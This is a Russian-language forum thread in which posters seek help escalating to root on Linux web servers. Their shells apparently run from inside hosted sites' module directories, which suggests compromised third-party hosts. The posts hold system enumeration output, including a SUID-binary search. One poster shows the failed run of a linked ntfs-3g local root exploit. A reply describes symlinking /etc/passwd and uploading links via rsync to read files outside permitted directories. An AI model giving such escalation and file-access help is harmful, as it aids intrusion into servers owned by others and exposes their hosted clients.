Парни, подскажите что можно попробовать. uname -a Code: Linux web1 2.6.32-26-pve #1 SMP Mon Oct 14 08:22:20 CEST 2013 i686 GNU/Linux ls -la /boot Code: drwxr-xr-x 2 root root 4096 Jan 9 2010 . drwxr-xr-x 20 root root 4096 Aug 7 2016 .. -rw-r--r-- 1 root root 103204 Sep 28 2007 memtest86+.bin ls -la --full-time /lib Code: drwxr-xr-x 13 root root 4096 2012-12-17 17:33:14.000000000 +0100 . drwxr-xr-x 20 root root 4096 2016-08-07 20:50:02.414264805 +0200 .. lrwxrwxrwx 1 root root 21 2010-03-02 18:37:34.000000000 +0100 cpp -> /etc/ alternatives/cpp drwxr-xr-x 2 root root 4096 2011-08-22 15:45:21.000000000 +0200 dhcp3-client drwxr-xr-x 2 root root 4096 2009-04-14 23:44:58.000000000 +0200 firmware drwxr-xr-x 2 root root 4096 2009-08-18 02:49:39.000000000 +0200 i486-linux-g nu drwxr-xr-x 2 root root 4096 2016-05-29 18:40:22.466740561 +0200 init drwxr-xr-x 2 root root 4096 2010-01-09 18:03:47.000000000 +0100 iptables -rwxr-xr-x 1 root root 64612 2010-01-20 10:21:10.000000000 +0100 klibc-B9LS-G jx2D7BYcbQig0RlgHKO9Y.so -rwxr-xr-x 1 root root 109152 2012-12-15 20:01:15.000000000 +0100 ld-2.7.so lrwxrwxrwx 1 root root 9 2012-12-17 17:33:13.000000000 +0100 ld-linux.so. 2 -> ld-2.7.so -rw-r--r-- 1 root root 5440 2012-12-15 20:01:15.000000000 +0100 libBrokenLoc ale-2.7.so lrwxrwxrwx 1 root root 22 2012-12-17 17:33:13.000000000 +0100 libBrokenLoc ale.so.1 -> libBrokenLocale-2.7.so -rw-r--r-- 1 root root 13696 2012-12-15 20:01:15.000000000 +0100 libSegFault. so lrwxrwxrwx 1 root root 15 2010-03-02 18:37:33.000000000 +0100 libacl.so.1 -> libacl.so.1.1.0 -rw-r--r-- 1 root root 22544 2007-11-14 11:59:18.000000000 +0100 libacl.so.1. 1.0 -rw-r--r-- 1 root root 9804 2012-12-15 20:01:15.000000000 +0100 libanl-2.7.s o lrwxrwxrwx 1 root root 13 2012-12-17 17:33:13.000000000 +0100 libanl.so.1 -> libanl-2.7.so lrwxrwxrwx 1 root root 15 2010-03-02 18:37:33.000000000 +0100 libatm.so.1 -> libatm.so.1.0.0 -rw-r--r-- 1 root root 32224 2007-08-14 22:27:59.000000000 +0200 libatm.so.1. 0.0 lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libattr.so.1 -> libattr.so.1.1.0 -rw-r--r-- 1 root root 13592 2007-10-31 23:45:11.000000000 +0100 libattr.so.1 .1.0 lrwxrwxrwx 1 root root 15 2010-03-02 18:37:33.000000000 +0100 libblkid.so. 1 -> libblkid.so.1.0 -rw-r--r-- 1 root root 36964 2008-03-27 18:25:48.000000000 +0100 libblkid.so. 1.0 lrwxrwxrwx 1 root root 15 2011-12-29 11:24:57.000000000 +0100 libbz2.so.1 -> libbz2.so.1.0.4 lrwxrwxrwx 1 root root 15 2011-12-29 11:24:57.000000000 +0100 libbz2.so.1. 0 -> libbz2.so.1.0.4 -rw-r--r-- 1 root root 66276 2011-12-12 23:40:54.000000000 +0100 libbz2.so.1. 0.4 -rwxr-xr-x 1 root root 1294572 2012-12-15 20:01:15.000000000 +0100 libc-2.7.so lrwxrwxrwx 1 root root 11 2012-12-17 17:33:13.000000000 +0100 libc.so.6 -> libc-2.7.so lrwxrwxrwx 1 root root 14 2010-03-02 18:37:33.000000000 +0100 libcap.so.1 -> libcap.so.1.10 -rw-r--r-- 1 root root 10316 2007-07-31 21:20:19.000000000 +0200 libcap.so.1. 10 lrwxrwxrwx 1 root root 17 2010-03-02 18:37:33.000000000 +0100 libcfont.so. 0 -> libcfont.so.0.0.0 -rw-r--r-- 1 root root 11512 2008-02-06 23:49:54.000000000 +0100 libcfont.so. 0.0.0 -rw-r--r-- 1 root root 181724 2012-12-15 20:01:15.000000000 +0100 libcidn-2.7. so lrwxrwxrwx 1 root root 14 2012-12-17 17:33:13.000000000 +0100 libcidn.so.1 -> libcidn-2.7.so lrwxrwxrwx 1 root root 17 2010-03-02 18:37:32.000000000 +0100 libcom_err.s o.2 -> libcom_err.so.2.1 -rw-r--r-- 1 root root 7444 2008-03-27 18:25:48.000000000 +0100 libcom_err.s o.2.1 lrwxrwxrwx 1 root root 19 2010-03-02 18:37:33.000000000 +0100 libconsole.s o.0 -> libconsole.so.0.0.0 -rw-r--r-- 1 root root 73312 2008-02-06 23:49:54.000000000 +0100 libconsole.s o.0.0.0 -rw-r--r-- 1 root root 38300 2012-12-15 20:01:15.000000000 +0100 libcrypt-2.7 .so lrwxrwxrwx 1 root root 15 2012-12-17 17:33:13.000000000 +0100 libcrypt.so. 1 -> libcrypt-2.7.so lrwxrwxrwx 1 root root 19 2010-03-02 18:37:32.000000000 +0100 libctutils.s o.0 -> libctutils.so.0.0.0 -rw-r--r-- 1 root root 17424 2008-02-06 23:49:54.000000000 +0100 libctutils.s o.0.0.0 -rw-r--r-- 1 root root 85108 2007-12-12 20:25:16.000000000 +0100 libdevmapper .so.1.02.1 -rw-r--r-- 1 root root 9684 2012-12-15 20:01:15.000000000 +0100 libdl-2.7.so lrwxrwxrwx 1 root root 12 2012-12-17 17:33:13.000000000 +0100 libdl.so.2 - > libdl-2.7.so lrwxrwxrwx 1 root root 13 2010-03-02 18:37:32.000000000 +0100 libe2p.so.2 -> libe2p.so.2.3 -rw-r--r-- 1 root root 20052 2008-03-27 18:25:48.000000000 +0100 libe2p.so.2. 3 lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libext2fs.so .2 -> libext2fs.so.2.4 -rw-r--r-- 1 root root 142792 2008-03-27 18:25:48.000000000 +0100 libext2fs.so .2.4 lrwxrwxrwx 1 root root 16 2011-03-03 13:04:15.000000000 +0100 libfuse.so.2 -> libfuse.so.2.7.2 -rw-r--r-- 1 root root 102816 2011-02-11 21:45:09.000000000 +0100 libfuse.so.2 .7.2 -rw-r--r-- 1 root root 42700 2009-02-19 11:39:17.000000000 +0100 libgcc_s.so. 1 lrwxrwxrwx 1 root root 19 2010-03-02 18:37:32.000000000 +0100 libgcrypt.so .11 -> libgcrypt.so.11.2.3 -rw-r--r-- 1 root root 310956 2007-12-07 12:34:06.000000000 +0100 libgcrypt.so .11.2.3 lrwxrwxrwx 1 root root 21 2010-03-02 18:37:33.000000000 +0100 libgpg-error .so.0 -> libgpg-error.so.0.3.0 -rw-r--r-- 1 root root 11468 2007-11-16 01:56:41.000000000 +0100 libgpg-error .so.0.3.0 lrwxrwxrwx 1 root root 17 2010-03-02 18:37:33.000000000 +0100 libhistory.s o.5 -> libhistory.so.5.2 -rw-r--r-- 1 root root 27188 2007-10-02 16:35:06.000000000 +0200 libhistory.s o.5.2 -rw-r--r-- 1 root root 27444 2007-12-21 15:36:58.000000000 +0100 libiw.so.29 -rw-r--r-- 1 root root 5644 2007-10-24 04:37:31.000000000 +0200 libkeyutils- 1.2.so lrwxrwxrwx 1 root root 18 2010-03-02 18:37:32.000000000 +0100 libkeyutils. so.1 -> libkeyutils-1.2.so -rw-r--r-- 1 root root 145232 2012-12-15 20:01:15.000000000 +0100 libm-2.7.so lrwxrwxrwx 1 root root 11 2012-12-17 17:33:13.000000000 +0100 libm.so.6 -> libm-2.7.so -rw-r--r-- 1 root root 13696 2012-12-15 20:01:15.000000000 +0100 libmemusage. so lrwxrwxrwx 1 root root 17 2010-03-02 18:37:32.000000000 +0100 libncurses.s o.5 -> libncurses.so.5.6 -rw-r--r-- 1 root root 190584 2008-02-24 00:38:14.000000000 +0100 libncurses.s o.5.6 lrwxrwxrwx 1 root root 18 2010-03-02 18:37:32.000000000 +0100 libncursesw. so.5 -> libncursesw.so.5.6 -rw-r--r-- 1 root root 236568 2008-02-24 00:38:14.000000000 +0100 libncursesw. so.5.6 -rw-r--r-- 1 root root 79612 2012-12-15 20:01:15.000000000 +0100 libnsl-2.7.s o lrwxrwxrwx 1 root root 13 2012-12-17 17:33:13.000000000 +0100 libnsl.so.1 -> libnsl-2.7.so -rw-r--r-- 1 root root 26340 2012-12-15 20:01:15.000000000 +0100 libnss_compa t-2.7.so lrwxrwxrwx 1 root root 20 2012-12-17 17:33:13.000000000 +0100 libnss_compa t.so.2 -> libnss_compat-2.7.so -rw-r--r-- 1 root root 17884 2012-12-15 20:01:15.000000000 +0100 libnss_dns-2 .7.so lrwxrwxrwx 1 root root 17 2012-12-17 17:33:13.000000000 +0100 libnss_dns.s o.2 -> libnss_dns-2.7.so -rw-r--r-- 1 root root 38412 2012-12-15 20:01:15.000000000 +0100 libnss_files -2.7.so lrwxrwxrwx 1 root root 19 2012-12-17 17:33:13.000000000 +0100 libnss_files .so.2 -> libnss_files-2.7.so -rw-r--r-- 1 root root 17900 2012-12-15 20:01:15.000000000 +0100 libnss_hesio d-2.7.so lrwxrwxrwx 1 root root 20 2012-12-17 17:33:13.000000000 +0100 libnss_hesio d.so.2 -> libnss_hesiod-2.7.so -rw-r--r-- 1 root root 34352 2012-12-15 20:01:15.000000000 +0100 libnss_nis-2 .7.so lrwxrwxrwx 1 root root 17 2012-12-17 17:33:13.000000000 +0100 libnss_nis.s o.2 -> libnss_nis-2.7.so -rw-r--r-- 1 root root 42508 2012-12-15 20:01:15.000000000 +0100 libnss_nispl us-2.7.so lrwxrwxrwx 1 root root 21 2012-12-17 17:33:13.000000000 +0100 libnss_nispl us.so.2 -> libnss_nisplus-2.7.so lrwxrwxrwx 1 root root 20 2010-03-02 18:37:32.000000000 +0100 libntfs-3g.s o.23 -> libntfs-3g.so.23.0.0 -rw-r--r-- 1 root root 182804 2008-07-10 12:19:22.000000000 +0200 libntfs-3g.s o.23.0.0 lrwxrwxrwx 1 root root 16 2011-11-10 22:29:24.000000000 +0100 libpam.so.0 -> libpam.so.0.81.6 -rw-r--r-- 1 root root 37956 2011-10-18 17:37:36.000000000 +0200 libpam.so.0. 81.6 lrwxrwxrwx 1 root root 21 2011-11-10 22:29:24.000000000 +0100 libpam_misc. so.0 -> libpam_misc.so.0.81.2 -rw-r--r-- 1 root root 8520 2011-10-18 17:37:36.000000000 +0200 libpam_misc. so.0.81.2 lrwxrwxrwx 1 root root 17 2011-11-10 22:29:24.000000000 +0100 libpamc.so.0 -> libpamc.so.0.81.0 -rw-r--r-- 1 root root 9028 2011-10-18 17:37:36.000000000 +0200 libpamc.so.0 .81.0 lrwxrwxrwx 1 root root 22 2010-03-02 18:37:33.000000000 +0100 libparted-1. 7.so.1 -> libparted-1.7.so.1.0.0 -rw-r--r-- 1 root root 388784 2009-06-05 11:42:39.000000000 +0200 libparted-1. 7.so.1.0.0 -rw-r--r-- 1 root root 5444 2012-12-15 20:01:15.000000000 +0100 libpcprofile .so lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libpopt.so.0 -> libpopt.so.0.0.0 -rw-r--r-- 1 root root 27144 2007-03-07 22:46:19.000000000 +0100 libpopt.so.0 .0.0 -rw-r--r-- 1 root root 49096 2008-07-10 11:28:34.000000000 +0200 libproc-3.2. 7.so -rwxr-xr-x 1 root root 112174 2012-12-15 20:01:20.000000000 +0100 libpthread-2 .7.so lrwxrwxrwx 1 root root 17 2012-12-17 17:33:13.000000000 +0100 libpthread.s o.0 -> libpthread-2.7.so lrwxrwxrwx 1 root root 18 2010-03-02 18:37:33.000000000 +0100 libreadline. so.5 -> libreadline.so.5.2 -rw-r--r-- 1 root root 196560 2007-10-02 16:35:06.000000000 +0200 libreadline. so.5.2 -rw-r--r-- 1 root root 59216 2012-12-15 20:01:15.000000000 +0100 libresolv-2. 7.so lrwxrwxrwx 1 root root 16 2012-12-17 17:33:13.000000000 +0100 libresolv.so .2 -> libresolv-2.7.so -rw-r--r-- 1 root root 30624 2012-12-15 20:01:15.000000000 +0100 librt-2.7.so lrwxrwxrwx 1 root root 12 2012-12-17 17:33:13.000000000 +0100 librt.so.1 - > librt-2.7.so -rw-r--r-- 1 root root 95948 2008-02-29 23:29:19.000000000 +0100 libselinux.s o.1 -rw-r--r-- 1 root root 207284 2008-03-01 06:21:06.000000000 +0100 libsepol.so. 1 lrwxrwxrwx 1 root root 17 2010-03-02 18:37:32.000000000 +0100 libslang.so. 2 -> libslang.so.2.1.3 -rw-r--r-- 1 root root 686384 2007-11-28 14:54:47.000000000 +0100 libslang.so. 2.1.3 lrwxrwxrwx 1 root root 12 2010-03-02 18:37:33.000000000 +0100 libss.so.2 - > libss.so.2.0 -rw-r--r-- 1 root root 18648 2008-03-27 18:25:48.000000000 +0100 libss.so.2.0 lrwxrwxrwx 1 root root 17 2010-03-02 18:37:33.000000000 +0100 libsysfs.so. 2 -> libsysfs.so.2.0.1 -rw-r--r-- 1 root root 37784 2008-04-01 19:03:20.000000000 +0200 libsysfs.so. 2.0.1 -rw-r--r-- 1 root root 26284 2012-12-15 20:01:15.000000000 +0100 libthread_db -1.0.so lrwxrwxrwx 1 root root 19 2012-12-17 17:33:13.000000000 +0100 libthread_db .so.1 -> libthread_db-1.0.so lrwxrwxrwx 1 root root 13 2010-03-02 18:37:32.000000000 +0100 libtic.so.5 -> libtic.so.5.6 -rw-r--r-- 1 root root 69952 2008-02-24 00:38:14.000000000 +0100 libtic.so.5. 6 lrwxrwxrwx 1 root root 14 2010-03-02 18:37:32.000000000 +0100 libticw.so.5 -> libticw.so.5.6 -rw-r--r-- 1 root root 69952 2008-02-24 00:38:14.000000000 +0100 libticw.so.5 .6 lrwxrwxrwx 1 root root 20 2011-03-03 13:04:15.000000000 +0100 libulockmgr. so.1 -> libulockmgr.so.1.0.1 -rw-r--r-- 1 root root 7836 2011-02-11 21:45:09.000000000 +0100 libulockmgr. so.1.0.1 lrwxrwxrwx 1 root root 19 2010-03-02 18:37:33.000000000 +0100 libusb-0.1.s o.4 -> libusb-0.1.so.4.4.4 -rw-r--r-- 1 root root 29056 2007-11-23 10:47:27.000000000 +0100 libusb-0.1.s o.4.4.4 -rw-r--r-- 1 root root 9696 2012-12-15 20:01:15.000000000 +0100 libutil-2.7. so lrwxrwxrwx 1 root root 14 2012-12-17 17:33:13.000000000 +0100 libutil.so.1 -> libutil-2.7.so lrwxrwxrwx 1 root root 14 2010-03-02 18:37:33.000000000 +0100 libuuid.so.1 -> libuuid.so.1.2 -rw-r--r-- 1 root root 13188 2008-03-27 18:25:48.000000000 +0100 libuuid.so.1 .2 lrwxrwxrwx 1 root root 22 2010-03-02 18:37:32.000000000 +0100 libvolume_id .so.0 -> libvolume_id.so.0.81.0 -rw-r--r-- 1 root root 27864 2009-04-14 23:45:06.000000000 +0200 libvolume_id .so.0.81.0 lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libwrap.so.0 -> libwrap.so.0.7.6 -rw-r--r-- 1 root root 31304 2007-07-30 10:19:43.000000000 +0200 libwrap.so.0 .7.6 drwxr-xr-x 2 root root 4096 2010-01-09 18:01:57.000000000 +0100 lsb drwxr-xr-x 2 root root 4096 2008-10-06 14:51:29.000000000 +0200 modules drwxr-xr-x 2 root root 4096 2011-11-10 22:29:15.000000000 +0100 security drwxr-xr-x 15 root root 4096 2008-02-24 00:38:00.000000000 +0100 terminfo drwxr-xr-x 3 root root 4096 2010-01-09 18:02:34.000000000 +0100 tls drwxr-xr-x 3 root root 4096 2011-01-21 16:23:48.000000000 +0100 udev mount Code: /dev/simfs on / type simfs (rw,relatime) /dev/mapper/pve-web1home on /home type ext4 (rw,noatime,relatime,barrier=1,data= ordered) proc on /proc type proc (rw,relatime) sysfs on /sys type sysfs (rw,relatime) tmpfs on /var/run type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755) tmpfs on /var/lock type tmpfs (rw,nosuid,nodev,noexec,relatime) tmpfs on /dev/shm type tmpfs (rw,relatime) devpts on /dev/pts type devpts (rw,relatime,gid=5,mode=620,ptmxmode=000) tmpfs on /var/run type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755) tmpfs on /var/lock type tmpfs (rw,nosuid,nodev,noexec,relatime) cat /etc/issue Code: Ubuntu 8.04.4 LTS \n \l cat /etc/crontab Code: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 50 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/c ron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/c ron.weekly ) 52 6 15 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/ cron.monthly ) cat /proc/version Code: Linux version 2.6.32-26-pve (root@lola) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1 SMP Mon Oct 14 08:22:20 CEST 2013 cat /proc/sys/vm/mmap_min_addr Code: 4096 ls -la /usr/bin/staprun Code: ls: cannot access /usr/bin/staprun: No such file or directory find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null Code: -rwsr-xr-x 1 root root 9624 Dec 15 2012 /usr/lib/pt_chown -rwsr-xr-- 1 root messagebus 228628 Oct 3 2012 /usr/lib/dbus-1.0/dbus-daemon-l aunch-helper -rwsr-xr-x 1 root root 4588 Aug 23 2008 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-- 1 root www-data 10276 Mar 8 2013 /usr/lib/apache2/suexec -rwsr-xr-x 1 root root 168340 Mar 8 2011 /usr/lib/openssh/ssh-keysign -rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd -rwsr-xr-x 2 root root 108068 Feb 27 2013 /usr/bin/sudoedit -rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr -rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X -rwsr-xr-x 2 root root 108068 Feb 27 2013 /usr/bin/sudo -rwsr-xr-x 1 root root 37360 Dec 8 2008 /usr/bin/gpasswd -rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping -rwsr-xr-x 1 root root 23952 Dec 8 2008 /usr/bin/chsh -rwsr-xr-x 1 root root 28624 Dec 8 2008 /usr/bin/chfn -rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at -rwsr-xr-x 1 root root 19144 Dec 8 2008 /usr/bin/newgrp -rwsr-xr-x 1 root root 29104 Dec 8 2008 /usr/bin/passwd
парни, поясните пожалуйста, как работает сплоит, и почему он у меня не работает? http://0day.today/exploit/26893 Code: /bin/bash ./d9.sh @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ CVE-2017-0359, PoC by Kristian Erik Hermansen @ @ ntfs-3g local privilege escalation to root @ @ Credits to Google Project Zero @ @ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @ @ Tested: Debian 9 (Stretch) @ @ Date: 2017-02-03 @ @ Link: https://goo.gl/A9I8Vq @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ [*] Gathering environment info ... [*] Creating kernel hijack directories ... [*] Forging symlinks ... ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/lib/modules\r/2.6.32-openvz-042stab120.16-amd64\r\r': No such file or directory ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/kernel/fs\r/fuse\r': No such file or directory [*] Pulling in deps ... [*] Building kernel module ... ./d9.sh: line 25: $'\r': command not found ./d9.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')
Судя по логу сплоит создает так называемые именованные ссылки (symlink). Это большая уязвимость в юникс системах, так как ссылка создана пользователем и сответственно есть права её читать. Помню был сценарий атаки когда с помощью rsync'a мы заливали ссылку и читали файлы конфига веб сервера и прочее. ln -s /etc/passwd /asd потом просто читаешь cat asd - таким образом часто байпассятся привелегии и есть возможность читать файлы за пределами допустимой диры. А ошибка простая, пытается создать ссылку на несуществующий файл.
uname -a Code: Linux winetime.ellyt.com 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64 GNU/Linux sh-4.3$ ls -la /boot Code: total 20512 drwxr-xr-x 3 root root 4096 Jun 1 08:25 . drwxr-xr-x 23 root root 4096 Jun 1 09:11 .. -rw-r--r-- 1 root root 2681172 Mar 8 01:59 System.map-3.16.0-4-amd64 -rw-r--r-- 1 root root 157815 Mar 8 01:59 config-3.16.0-4-amd64 drwxr-xr-x 5 root root 4096 Apr 6 11:52 grub -rw-r--r-- 1 root root 15017568 Jun 1 08:25 initrd.img-3.16.0-4-amd64 -rw-r--r-- 1 root root 3128784 Mar 8 01:58 vmlinuz-3.16.0-4-amd64 ls -la --full-time /lib Code: total 280 drwxr-xr-x 16 root root 4096 2017-06-01 08:24:38.147095248 +0300 . drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 .. lrwxrwxrwx 1 root root 21 2017-04-07 21:12:08.155124000 +0300 cpp -> /etc/alternatives/cpp drwxr-xr-x 2 root root 4096 2017-04-06 11:11:32.822435000 +0300 discover drwxr-xr-x 2 root root 4096 2017-04-06 11:08:06.370435000 +0300 ifupdown drwxr-xr-x 2 root root 4096 2017-04-06 11:07:50.358435000 +0300 init -rwxr-xr-x 1 root root 71416 2014-10-05 04:01:50.000000000 +0300 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so lrwxrwxrwx 1 root root 17 2014-11-08 19:03:39.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0 -rw-r--r-- 1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip4tc.so.0.1.0 lrwxrwxrwx 1 root root 17 2014-11-08 19:03:39.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0 -rw-r--r-- 1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip6tc.so.0.1.0 lrwxrwxrwx 1 root root 15 2014-11-08 19:03:39.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0 -rw-r--r-- 1 root root 10544 2014-11-08 19:03:41.000000000 +0200 libipq.so.0.0.0 lrwxrwxrwx 1 root root 16 2014-11-08 19:03:39.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0 -rw-r--r-- 1 root root 5816 2014-11-08 19:03:41.000000000 +0200 libiptc.so.0.0.0 lrwxrwxrwx 1 root root 20 2014-11-08 19:03:39.000000000 +0200 libxtables.so.10 -> libxtables.so.10.0.0 -rw-r--r-- 1 root root 51896 2014-11-08 19:03:42.000000000 +0200 libxtables.so.10.0.0 drwxr-xr-x 3 root root 4096 2017-04-06 11:07:50.206435000 +0300 lsb drwxr-xr-x 2 root root 4096 2017-04-06 11:08:07.734435000 +0300 modprobe.d drwxr-xr-x 3 root root 4096 2017-04-06 11:08:31.846435000 +0300 modules drwxr-xr-x 2 root root 4096 2017-06-01 08:24:38.227099822 +0300 modules-load.d drwxr-xr-x 2 root root 4096 2017-04-06 11:07:50.270435000 +0300 startpar drwxr-xr-x 8 root root 4096 2017-04-06 11:07:55.662435000 +0300 systemd drwxr-xr-x 15 root root 4096 2017-04-06 11:07:27.242435000 +0300 terminfo drwxr-xr-x 4 root root 4096 2017-04-06 11:08:00.966435000 +0300 udev drwxr-xr-x 2 root root 4096 2017-04-22 18:39:02.116227245 +0300 ufw drwxr-xr-x 4 root root 12288 2017-06-01 08:24:52.967942493 +0300 x86_64-linux-gnu drwxr-xr-x 2 root root 4096 2017-04-06 11:08:07.490435000 +0300 xtables ls -la --full-time /lib64 Code: total 8 drwxr-xr-x 2 root root 4096 2017-04-06 11:07:37.814435000 +0300 . drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 .. lrwxrwxrwx 1 root root 32 2016-11-28 06:26:42.000000000 +0200 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so mount Code: sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=255197,mode=755) devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000) tmpfs on /run type tmpfs (rw,nosuid,relatime,size=411712k,mode=755) /dev/sda2 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group) securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k) tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755) cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd) pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime) cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset) cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct) cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices) cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer) cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio) cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio) cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event) systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct) mqueue on /dev/mqueue type mqueue (rw,relatime) debugfs on /sys/kernel/debug type debugfs (rw,relatime) hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime) fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime) /dev/sdb1 on /var type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group) /dev/sdc1 on /backup type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group) /dev/sdb1 on /var/www/clients/client2/web7/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group) rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime) /dev/sdb1 on /var/www/clients/client2/web6/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group) /dev/sdb1 on /var/www/clients/client2/web8/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime) df -h Code: Filesystem Size Used Avail Use% Mounted on /dev/sda2 3.0G 1.8G 1.1G 62% / udev 10M 0 10M 0% /dev tmpfs 403M 41M 362M 11% /run tmpfs 1006M 0 1006M 0% /dev/shm tmpfs 5.0M 4.0K 5.0M 1% /run/lock tmpfs 1006M 0 1006M 0% /sys/fs/cgroup /dev/sdb1 99G 40G 54G 43% /var /dev/sdc1 99G 359M 93G 1% /backup Code: Debian GNU/Linux 8 \n \l cat /etc/crontab Code: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # cat /proc/version Code: Linux version 3.16.0-4-amd64 ([email protected]) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) cat /proc/sys/vm/mmap_min_addr Code: 65536 pwd Code: /var/www/clients/client2/web8/web/modules/crm ls -la /usr/bin/staprun Code: ls: cannot access /usr/bin/staprun: No such file or directory sh-4.3$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null Code: find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null -rwsr-xr-x 1 root root 90456 Aug 13 2014 /sbin/mount.nfs -rwsr-xr-x 1 root root 23472 Apr 7 21:58 /usr/sbin/jk_chrootsh -rwsr-xr-x 1 root root 13824 Apr 7 21:58 /usr/sbin/jk_procmailwrapper -rwsr-xr-- 1 root www-data 18472 Feb 24 20:40 /usr/lib/apache2/suexec-pristine -rwsr-xr-x 1 root root 10104 Mar 28 08:33 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 464904 Jul 22 2016 /usr/lib/openssh/ssh-keysign -rwsr-xr-- 1 root messagebus 294512 Nov 22 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 39912 Feb 24 10:09 /usr/bin/newgrp -rwsr-sr-x 1 root mail 89248 Feb 11 2015 